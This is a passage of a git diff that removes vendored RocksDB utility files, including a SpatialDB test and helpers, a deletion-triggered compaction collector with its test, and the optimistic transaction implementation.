-
-  ASSERT_TRUE(c->Valid());
-  ASSERT_EQ(c->blob().compare("one"), 0);
-  FeatureSet returned = c->feature_set();
-  ASSERT_TRUE(returned.Contains("a"));
-  ASSERT_TRUE(!returned.Contains("b"));
-  ASSERT_TRUE(returned.Contains("c"));
-  ASSERT_EQ(returned.Get("a").type(), Variant::kString);
-  ASSERT_EQ(returned.Get("a").get_string(), "b");
-  ASSERT_EQ(returned.Get("c").type(), Variant::kString);
-  ASSERT_EQ(returned.Get("c").get_string(), "d");
-
-  c->Next();
-  ASSERT_TRUE(!c->Valid());
-
-  delete c;
-  delete db_;
-}
-
-TEST_F(SpatialDBTest, SimpleTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  // iter 0 -- not read only
-  // iter 1 -- read only
-  for (int iter = 0; iter < 2; ++iter) {
-    DestroyDB(dbname_, Options());
-    ASSERT_OK(SpatialDB::Create(
-        SpatialDBOptions(), dbname_,
-        {SpatialIndexOptions("index", BoundingBox<double>(0, 0, 128, 128),
-                             3)}));
-    ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-    assert(db_ != nullptr);
-
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(33, 17, 63, 79),
-                          "one", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(65, 65, 111, 111),
-                          "two", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(1, 49, 127, 63),
-                          "three", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(20, 100, 21, 101),
-                          "four", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(81, 33, 127, 63),
-                          "five", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(1, 65, 47, 95),
-                          "six", FeatureSet(), {"index"}));
-
-    if (iter == 1) {
-      delete db_;
-      db_ = nullptr;
-      ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_, true));
-    }
-
-    AssertCursorResults(BoundingBox<double>(33, 17, 47, 31), "index", {"one"});
-    AssertCursorResults(BoundingBox<double>(17, 33, 79, 63), "index",
-                        {"one", "three"});
-    AssertCursorResults(BoundingBox<double>(17, 81, 63, 111), "index",
-                        {"four", "six"});
-    AssertCursorResults(BoundingBox<double>(85, 86, 85, 86), "index", {"two"});
-    AssertCursorResults(BoundingBox<double>(33, 1, 127, 111), "index",
-                        {"one", "two", "three", "five", "six"});
-    // even though the bounding box doesn't intersect, we got "four" back
-    // because
-    // it's in the same tile
-    AssertCursorResults(BoundingBox<double>(18, 98, 19, 99), "index", {"four"});
-    AssertCursorResults(BoundingBox<double>(130, 130, 131, 131), "index", {});
-    AssertCursorResults(BoundingBox<double>(81, 17, 127, 31), "index", {});
-    AssertCursorResults(BoundingBox<double>(90, 50, 91, 51), "index",
-                        {"three", "five"});
-
-    delete db_;
-    db_ = nullptr;
-  }
-}
-
-namespace {
-std::string RandomStr(Random* rnd) {
-  std::string r;
-  for (int k = 0; k < 10; ++k) {
-    r.push_back(rnd->Uniform(26) + 'a');
-  }
-  return r;
-}
-
-BoundingBox<int> RandomBoundingBox(int limit, Random* rnd, int max_size) {
-  BoundingBox<int> r;
-  r.min_x = rnd->Uniform(limit - 1);
-  r.min_y = rnd->Uniform(limit - 1);
-  r.max_x = r.min_x + rnd->Uniform(std::min(limit - 1 - r.min_x, max_size)) + 1;
-  r.max_y = r.min_y + rnd->Uniform(std::min(limit - 1 - r.min_y, max_size)) + 1;
-  return r;
-}
-
-BoundingBox<double> ScaleBB(BoundingBox<int> b, double step) {
-  return BoundingBox<double>(b.min_x * step + 1, b.min_y * step + 1,
-                             (b.max_x + 1) * step - 1,
-                             (b.max_y + 1) * step - 1);
-}
-
-}  // namespace
-
-TEST_F(SpatialDBTest, RandomizedTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  Random rnd(301);
-  std::vector<std::pair<std::string, BoundingBox<int>>> elements;
-
-  BoundingBox<double> spatial_index_bounds(0, 0, (1LL << 32), (1LL << 32));
-  ASSERT_OK(SpatialDB::Create(
-      SpatialDBOptions(), dbname_,
-      {SpatialIndexOptions("index", spatial_index_bounds, 7)}));
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  double step = (1LL << 32) / (1 << 7);
-
-  for (int i = 0; i < 1000; ++i) {
-    std::string blob = RandomStr(&rnd);
-    BoundingBox<int> bbox = RandomBoundingBox(128, &rnd, 10);
-    ASSERT_OK(db_->Insert(WriteOptions(), ScaleBB(bbox, step), blob,
-                          FeatureSet(), {"index"}));
-    elements.push_back(make_pair(blob, bbox));
-  }
-
-  // parallel
-  db_->Compact(2);
-  // serial
-  db_->Compact(1);
-
-  for (int i = 0; i < 1000; ++i) {
-    BoundingBox<int> int_bbox = RandomBoundingBox(128, &rnd, 10);
-    BoundingBox<double> double_bbox = ScaleBB(int_bbox, step);
-    std::vector<std::string> blobs;
-    for (auto e : elements) {
-      if (e.second.Intersects(int_bbox)) {
-        blobs.push_back(e.first);
-      }
-    }
-    AssertCursorResults(double_bbox, "index", blobs);
-  }
-
-  delete db_;
-}
-
-}  // namespace spatial
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as SpatialDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/spatialdb/utils.h b/thirdparty/rocksdb/utilities/spatialdb/utils.h
deleted file mode 100644
index fe4b4e2..0000000
--- a/thirdparty/rocksdb/utilities/spatialdb/utils.h
+++ /dev/null
@@ -1,95 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include <algorithm>
-
-#include "rocksdb/utilities/spatial_db.h"
-
-namespace rocksdb {
-namespace spatial {
-
-// indexing idea from http://msdn.microsoft.com/en-us/library/bb259689.aspx
-inline uint64_t GetTileFromCoord(double x, double start, double end,
-                                 uint32_t tile_bits) {
-  if (x < start) {
-    return 0;
-  }
-  uint64_t tiles = 1ull << tile_bits;
-  uint64_t r = static_cast<uint64_t>(((x - start) / (end - start)) * tiles);
-  return std::min(r, tiles - 1);
-}
-
-inline uint64_t GetQuadKeyFromTile(uint64_t tile_x, uint64_t tile_y,
-                                   uint32_t tile_bits) {
-  uint64_t quad_key = 0;
-  for (uint32_t i = 0; i < tile_bits; ++i) {
-    uint64_t mask = (1ull << i);
-    quad_key |= (tile_x & mask) << i;
-    quad_key |= (tile_y & mask) << (i + 1);
-  }
-  return quad_key;
-}
-
-inline BoundingBox<uint64_t> GetTileBoundingBox(
-    const SpatialIndexOptions& spatial_index, BoundingBox<double> bbox) {
-  return BoundingBox<uint64_t>(
-      GetTileFromCoord(bbox.min_x, spatial_index.bbox.min_x,
-                       spatial_index.bbox.max_x, spatial_index.tile_bits),
-      GetTileFromCoord(bbox.min_y, spatial_index.bbox.min_y,
-                       spatial_index.bbox.max_y, spatial_index.tile_bits),
-      GetTileFromCoord(bbox.max_x, spatial_index.bbox.min_x,
-                       spatial_index.bbox.max_x, spatial_index.tile_bits),
-      GetTileFromCoord(bbox.max_y, spatial_index.bbox.min_y,
-                       spatial_index.bbox.max_y, spatial_index.tile_bits));
-}
-
-// big endian can be compared using memcpy
-inline void PutFixed64BigEndian(std::string* dst, uint64_t value) {
-  char buf[sizeof(value)];
-  buf[0] = (value >> 56) & 0xff;
-  buf[1] = (value >> 48) & 0xff;
-  buf[2] = (value >> 40) & 0xff;
-  buf[3] = (value >> 32) & 0xff;
-  buf[4] = (value >> 24) & 0xff;
-  buf[5] = (value >> 16) & 0xff;
-  buf[6] = (value >> 8) & 0xff;
-  buf[7] = value & 0xff;
-  dst->append(buf, sizeof(buf));
-}
-
-// big endian can be compared using memcpy
-inline bool GetFixed64BigEndian(const Slice& input, uint64_t* value) {
-  if (input.size() < sizeof(uint64_t)) {
-    return false;
-  }
-  auto ptr = input.data();
-  *value = (static_cast<uint64_t>(static_cast<unsigned char>(ptr[0])) << 56) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[1])) << 48) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[2])) << 40) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[3])) << 32) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[4])) << 24) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[5])) << 16) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[6])) << 8) |
-           static_cast<uint64_t>(static_cast<unsigned char>(ptr[7]));
-  return true;
-}
-
-inline void PutDouble(std::string* dst, double d) {
-  dst->append(reinterpret_cast<char*>(&d), sizeof(double));
-}
-
-inline bool GetDouble(Slice* input, double* d) {
-  if (input->size() < sizeof(double)) {
-    return false;
-  }
-  memcpy(d, input->data(), sizeof(double));
-  input->remove_prefix(sizeof(double));
-  return true;
-}
-
-}  // namespace spatial
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.cc
deleted file mode 100644
index 304cdff..0000000
--- a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.cc
+++ /dev/null
@@ -1,94 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "utilities/table_properties_collectors/compact_on_deletion_collector.h"
-
-#include <memory>
-#include "rocksdb/utilities/table_properties_collectors.h"
-
-namespace rocksdb {
-
-CompactOnDeletionCollector::CompactOnDeletionCollector(
-    size_t sliding_window_size,
-    size_t deletion_trigger) {
-  deletion_trigger_ = deletion_trigger;
-
-  // First, compute the number of keys in each bucket.
-  bucket_size_ =
-      (sliding_window_size + kNumBuckets - 1) / kNumBuckets;
-  assert(bucket_size_ > 0U);
-
-  Reset();
-}
-
-void CompactOnDeletionCollector::Reset() {
-  for (int i = 0; i < kNumBuckets; ++i) {
-    num_deletions_in_buckets_[i] = 0;
-  }
-  current_bucket_ = 0;
-  num_keys_in_current_bucket_ = 0;
-  num_deletions_in_observation_window_ = 0;
-  need_compaction_ = false;
-}
-
-// AddUserKey() will be called when a new key/value pair is inserted into the
-// table.
-// @params key    the user key that is inserted into the table.
-// @params value  the value that is inserted into the table.
-// @params file_size  file size up to now
-Status CompactOnDeletionCollector::AddUserKey(
-    const Slice& key, const Slice& value,
-    EntryType type, SequenceNumber seq,
-    uint64_t file_size) {
-  if (need_compaction_) {
-    // If the output file already needs to be compacted, skip the check.
-    return Status::OK();
-  }
-
-  if (num_keys_in_current_bucket_ == bucket_size_) {
-    // When the current bucket is full, advance the cursor of the
-    // ring buffer to the next bucket.
-    current_bucket_ = (current_bucket_ + 1) % kNumBuckets;
-
-    // Update the current count of observed deletion keys by excluding
-    // the number of deletion keys in the oldest bucket in the
-    // observation window.
-    assert(num_deletions_in_observation_window_ >=
-        num_deletions_in_buckets_[current_bucket_]);
-    num_deletions_in_observation_window_ -=
-        num_deletions_in_buckets_[current_bucket_];
-    num_deletions_in_buckets_[current_bucket_] = 0;
-    num_keys_in_current_bucket_ = 0;
-  }
-
-  num_keys_in_current_bucket_++;
-  if (type == kEntryDelete) {
-    num_deletions_in_observation_window_++;
-    num_deletions_in_buckets_[current_bucket_]++;
-    if (num_deletions_in_observation_window_ >= deletion_trigger_) {
-      need_compaction_ = true;
-    }
-  }
-  return Status::OK();
-}
-
-TablePropertiesCollector*
-CompactOnDeletionCollectorFactory::CreateTablePropertiesCollector(
-    TablePropertiesCollectorFactory::Context context) {
-  return new CompactOnDeletionCollector(
-      sliding_window_size_, deletion_trigger_);
-}
-
-std::shared_ptr<TablePropertiesCollectorFactory>
-    NewCompactOnDeletionCollectorFactory(
-        size_t sliding_window_size,
-        size_t deletion_trigger) {
-  return std::shared_ptr<TablePropertiesCollectorFactory>(
-      new CompactOnDeletionCollectorFactory(
-          sliding_window_size, deletion_trigger));
-}
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.h b/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.h
deleted file mode 100644
index bd240e5..0000000
--- a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.h
+++ /dev/null
@@ -1,103 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include "rocksdb/utilities/table_properties_collectors.h"
-namespace rocksdb {
-
-// A factory of a table property collector that marks a SST
-// file as need-compaction when it observe at least "D" deletion
-// entries in any "N" consecutive entires.
-class CompactOnDeletionCollectorFactory
-    : public TablePropertiesCollectorFactory {
- public:
-  // A factory of a table property collector that marks a SST
-  // file as need-compaction when it observe at least "D" deletion
-  // entries in any "N" consecutive entires.
-  //
-  // @param sliding_window_size "N"
-  // @param deletion_trigger "D"
-  CompactOnDeletionCollectorFactory(
-      size_t sliding_window_size,
-      size_t deletion_trigger) :
-          sliding_window_size_(sliding_window_size),
-          deletion_trigger_(deletion_trigger) {}
-
-  virtual ~CompactOnDeletionCollectorFactory() {}
-
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override;
-
-  virtual const char* Name() const override {
-    return "CompactOnDeletionCollector";
-  }
-
- private:
-  size_t sliding_window_size_;
-  size_t deletion_trigger_;
-};
-
-class CompactOnDeletionCollector : public TablePropertiesCollector {
- public:
-  CompactOnDeletionCollector(
-      size_t sliding_window_size,
-      size_t deletion_trigger);
-
-  // AddUserKey() will be called when a new key/value pair is inserted into the
-  // table.
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  // @params file_size  file size up to now
-  virtual Status AddUserKey(const Slice& key, const Slice& value,
-                            EntryType type, SequenceNumber seq,
-                            uint64_t file_size) override;
-
-  // Finish() will be called when a table has already been built and is ready
-  // for writing the properties block.
-  // @params properties  User will add their collected statistics to
-  // `properties`.
-  virtual Status Finish(UserCollectedProperties* properties) override {
-    Reset();
-    return Status::OK();
-  }
-
-  // Return the human-readable properties, where the key is property name and
-  // the value is the human-readable form of value.
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties();
-  }
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const override {
-    return "CompactOnDeletionCollector";
-  }
-
-  // EXPERIMENTAL Return whether the output file should be further compacted
-  virtual bool NeedCompact() const override {
-    return need_compaction_;
-  }
-
-  static const int kNumBuckets = 128;
-
- private:
-  void Reset();
-
-  // A ring buffer that used to count the number of deletion entries for every
-  // "bucket_size_" keys.
-  size_t num_deletions_in_buckets_[kNumBuckets];
-  // the number of keys in a bucket
-  size_t bucket_size_;
-
-  size_t current_bucket_;
-  size_t num_keys_in_current_bucket_;
-  size_t num_deletions_in_observation_window_;
-  size_t deletion_trigger_;
-  // true if the current SST file needs to be compacted.
-  bool need_compaction_;
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
deleted file mode 100644
index 3c946bf..0000000
--- a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
+++ /dev/null
@@ -1,178 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <stdio.h>
-
-#ifndef ROCKSDB_LITE
-#include <algorithm>
-#include <cmath>
-#include <vector>
-
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/utilities/table_properties_collectors.h"
-#include "util/random.h"
-#include "utilities/table_properties_collectors/compact_on_deletion_collector.h"
-
-int main(int argc, char** argv) {
-  const int kWindowSizes[] =
-      {1000, 10000, 10000, 127, 128, 129, 255, 256, 257, 2, 10000};
-  const int kDeletionTriggers[] =
-      {500, 9500, 4323, 47, 61, 128, 250, 250, 250, 2, 2};
-  rocksdb::TablePropertiesCollectorFactory::Context context;
-  context.column_family_id =
-      rocksdb::TablePropertiesCollectorFactory::Context::kUnknownColumnFamily;
-
-  std::vector<int> window_sizes;
-  std::vector<int> deletion_triggers;
-  // deterministic tests
-  for (int test = 0; test < 9; ++test) {
-    window_sizes.emplace_back(kWindowSizes[test]);
-    deletion_triggers.emplace_back(kDeletionTriggers[test]);
-  }
-
-  // randomize tests
-  rocksdb::Random rnd(301);
-  const int kMaxTestSize = 100000l;
-  for (int random_test = 0; random_test < 100; random_test++) {
-    int window_size = rnd.Uniform(kMaxTestSize) + 1;
-    int deletion_trigger = rnd.Uniform(window_size);
-    window_sizes.emplace_back(window_size);
-    deletion_triggers.emplace_back(deletion_trigger);
-  }
-
-  assert(window_sizes.size() == deletion_triggers.size());
-
-  for (size_t test = 0; test < window_sizes.size(); ++test) {
-    const int kBucketSize = 128;
-    const int kWindowSize = window_sizes[test];
-    const int kPaddedWindowSize =
-        kBucketSize * ((window_sizes[test] + kBucketSize - 1) / kBucketSize);
-    const int kNumDeletionTrigger = deletion_triggers[test];
-    const int kBias = (kNumDeletionTrigger + kBucketSize - 1) / kBucketSize;
-    // Simple test
-    {
-      std::unique_ptr<rocksdb::TablePropertiesCollector> collector;
-      auto factory = rocksdb::NewCompactOnDeletionCollectorFactory(
-          kWindowSize, kNumDeletionTrigger);
-      collector.reset(factory->CreateTablePropertiesCollector(context));
-      const int kSample = 10;
-      for (int delete_rate = 0; delete_rate <= kSample; ++delete_rate) {
-        int deletions = 0;
-        for (int i = 0; i < kPaddedWindowSize; ++i) {
-          if (i % kSample < delete_rate) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryDelete, 0, 0);
-            deletions++;
-          } else {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        if (collector->NeedCompact() !=
-            (deletions >= kNumDeletionTrigger) &&
-            std::abs(deletions - kNumDeletionTrigger) > kBias) {
-          fprintf(stderr, "[Error] collector->NeedCompact() != (%d >= %d)"
-                  " with kWindowSize = %d and kNumDeletionTrigger = %d\n",
-                  deletions, kNumDeletionTrigger,
-                  kWindowSize, kNumDeletionTrigger);
-          assert(false);
-        }
-        collector->Finish(nullptr);
-      }
-    }
-
-    // Only one section of a file satisfies the compaction trigger
-    {
-      std::unique_ptr<rocksdb::TablePropertiesCollector> collector;
-      auto factory = rocksdb::NewCompactOnDeletionCollectorFactory(
-          kWindowSize, kNumDeletionTrigger);
-      collector.reset(factory->CreateTablePropertiesCollector(context));
-      const int kSample = 10;
-      for (int delete_rate = 0; delete_rate <= kSample; ++delete_rate) {
-        int deletions = 0;
-        for (int section = 0; section < 5; ++section) {
-          int initial_entries = rnd.Uniform(kWindowSize) + kWindowSize;
-          for (int i = 0; i < initial_entries; ++i) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        for (int i = 0; i < kPaddedWindowSize; ++i) {
-          if (i % kSample < delete_rate) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryDelete, 0, 0);
-            deletions++;
-          } else {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        for (int section = 0; section < 5; ++section) {
-          int ending_entries = rnd.Uniform(kWindowSize) + kWindowSize;
-          for (int i = 0; i < ending_entries; ++i) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        if (collector->NeedCompact() != (deletions >= kNumDeletionTrigger) &&
-            std::abs(deletions - kNumDeletionTrigger) > kBias) {
-          fprintf(stderr, "[Error] collector->NeedCompact() %d != (%d >= %d)"
-                  " with kWindowSize = %d, kNumDeletionTrigger = %d\n",
-                  collector->NeedCompact(),
-                  deletions, kNumDeletionTrigger, kWindowSize,
-                  kNumDeletionTrigger);
-          assert(false);
-        }
-        collector->Finish(nullptr);
-      }
-    }
-
-    // TEST 3:  Issues a lots of deletes, but their density is not
-    // high enough to trigger compaction.
-    {
-      std::unique_ptr<rocksdb::TablePropertiesCollector> collector;
-      auto factory = rocksdb::NewCompactOnDeletionCollectorFactory(
-          kWindowSize, kNumDeletionTrigger);
-      collector.reset(factory->CreateTablePropertiesCollector(context));
-      assert(collector->NeedCompact() == false);
-      // Insert "kNumDeletionTrigger * 0.95" deletions for every
-      // "kWindowSize" and verify compaction is not needed.
-      const int kDeletionsPerSection = kNumDeletionTrigger * 95 / 100;
-      if (kDeletionsPerSection >= 0) {
-        for (int section = 0; section < 200; ++section) {
-          for (int i = 0; i < kPaddedWindowSize; ++i) {
-            if (i < kDeletionsPerSection) {
-              collector->AddUserKey("hello", "rocksdb",
-                                    rocksdb::kEntryDelete, 0, 0);
-            } else {
-              collector->AddUserKey("hello", "rocksdb",
-                                    rocksdb::kEntryPut, 0, 0);
-            }
-          }
-        }
-        if (collector->NeedCompact() &&
-            std::abs(kDeletionsPerSection - kNumDeletionTrigger) > kBias) {
-          fprintf(stderr, "[Error] collector->NeedCompact() != false"
-                  " with kWindowSize = %d and kNumDeletionTrigger = %d\n",
-                  kWindowSize, kNumDeletionTrigger);
-          assert(false);
-        }
-        collector->Finish(nullptr);
-      }
-    }
-  }
-  fprintf(stderr, "PASSED\n");
-}
-#else
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as RocksDBLite does not include utilities.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.cc b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.cc
deleted file mode 100644
index 89d3226..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.cc
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/optimistic_transaction.h"
-
-#include <string>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-struct WriteOptions;
-
-OptimisticTransaction::OptimisticTransaction(
-    OptimisticTransactionDB* txn_db, const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options)
-    : TransactionBaseImpl(txn_db->GetBaseDB(), write_options), txn_db_(txn_db) {
-  Initialize(txn_options);
-}
-
-void OptimisticTransaction::Initialize(
-    const OptimisticTransactionOptions& txn_options) {
-  if (txn_options.set_snapshot) {
-    SetSnapshot();
-  }
-}
-
-void OptimisticTransaction::Reinitialize(
-    OptimisticTransactionDB* txn_db, const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options) {
-  TransactionBaseImpl::Reinitialize(txn_db->GetBaseDB(), write_options);
-  Initialize(txn_options);
-}
-
-OptimisticTransaction::~OptimisticTransaction() {}
-
-void OptimisticTransaction::Clear() { TransactionBaseImpl::Clear(); }
-
-Status OptimisticTransaction::Prepare() {
-  return Status::InvalidArgument(
-      "Two phase commit not supported for optimistic transactions.");
-}
-
-Status OptimisticTransaction::Commit() {
-  // Set up callback which will call CheckTransactionForConflicts() to
-  // check whether this transaction is safe to be committed.
-  OptimisticTransactionCallback callback(this);
-
-  DBImpl* db_impl = static_cast_with_check<DBImpl, DB>(db_->GetRootDB());
-
-  Status s = db_impl->WriteWithCallback(
-      write_options_, GetWriteBatch()->GetWriteBatch(), &callback);
-
-  if (s.ok()) {
-    Clear();
-  }
-
-  return s;
-}
-
-Status OptimisticTransaction::Rollback() {
-  Clear();
-  return Status::OK();
-}
-
-// Record this key so that we can check it for conflicts at commit time.
-//
-// 'exclusive' is unused for OptimisticTransaction.
-Status OptimisticTransaction::TryLock(ColumnFamilyHandle* column_family,
-                                      const Slice& key, bool read_only,
-                                      bool exclusive, bool untracked) {
-  if (untracked) {
-    return Status::OK();
-  }
-  uint32_t cfh_id = GetColumnFamilyID(column_family);
-
-  SetSnapshotIfNeeded();
-
-  SequenceNumber seq;
-  if (snapshot_) {
-    seq = snapshot_->GetSequenceNumber();
-  } else {
-    seq = db_->GetLatestSequenceNumber();
-  }
-
-  std::string key_str = key.ToString();
-
-  TrackKey(cfh_id, key_str, seq, read_only, exclusive);
-
-  // Always return OK. Confilct checking will happen at commit time.
-  return Status::OK();
-}
-
-// Returns OK if it is safe to commit this transaction.  Returns Status::Busy
-// if there are read or write conflicts that would prevent us from committing OR
-// if we can not determine whether there would be any such conflicts.
-//
-// Should only be called on writer thread in order to avoid any race conditions
-// in detecting write conflicts.
-Status OptimisticTransaction::CheckTransactionForConflicts(DB* db) {
-  Status result;
-
-  auto db_impl = static_cast_with_check<DBImpl, DB>(db);
-
-  // Since we are on the write thread and do not want to block other writers,
-  // we will do a cache-only conflict check.  This can result in TryAgain
-  // getting returned if there is not sufficient memtable history to check
-  // for conflicts.
-  return TransactionUtil::CheckKeysForConflicts(db_impl, GetTrackedKeys(),
-                                                true /* cache_only */);
-}
-
-Status OptimisticTransaction::SetName(const TransactionName& /* unused */) {
-  return Status::InvalidArgument("Optimistic transactions cannot be named.");
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.h b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.h
deleted file mode 100644
index 5a19489..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.h
+++ /dev/null
@@ -1,98 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <stack>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "utilities/transactions/transaction_base.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class OptimisticTransaction : public TransactionBaseImpl {
- public:
-  OptimisticTransaction(OptimisticTransactionDB* db,
-                        const WriteOptions& write_options,
-                        const OptimisticTransactionOptions& txn_options);
-
-  virtual ~OptimisticTransaction();
-
-  void Reinitialize(OptimisticTransactionDB* txn_db,
-                    const WriteOptions& write_options,
-                    const OptimisticTransactionOptions& txn_options);
-
-  Status Prepare() override;
-
-  Status Commit() override;
-
-  Status Rollback() override;
-
-  Status SetName(const TransactionName& name) override;
-
- protected:
-  Status TryLock(ColumnFamilyHandle* column_family, const Slice& key,
-                 bool read_only, bool exclusive,
-                 bool untracked = false) override;
-
- private:
-  OptimisticTransactionDB* const txn_db_;
-
-  friend class OptimisticTransactionCallback;
-
-  void Initialize(const OptimisticTransactionOptions& txn_options);
-
-  // Returns OK if it is safe to commit this transaction.  Returns Status::Busy
-  // if there are read or write conflicts that would prevent us from committing
-  // OR if we can not determine whether there would be any such conflicts.
-  //
-  // Should only be called on writer thread.
-  Status CheckTransactionForConflicts(DB* db);
-
-  void Clear() override;
-
-  void UnlockGetForUpdate(ColumnFamilyHandle* /* unused */,
-                          const Slice& /* unused */) override {
-    // Nothing to unlock.
-  }
-
-  // No copying allowed
-  OptimisticTransaction(const OptimisticTransaction&);
-  void operator=(const OptimisticTransaction&);
-};
-
-// Used at commit time to trigger transaction validation
-class OptimisticTransactionCallback : public WriteCallback {
- public:
-  explicit OptimisticTransactionCallback(OptimisticTransaction* txn)
-      : txn_(txn) {}
-
-  Status Callback(DB* db) override {
-    return txn_->CheckTransactionForConflicts(db);
-  }
-
-  bool AllowWriteBatching() override { return false; }
-
- private:
-  OptimisticTransaction* txn_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
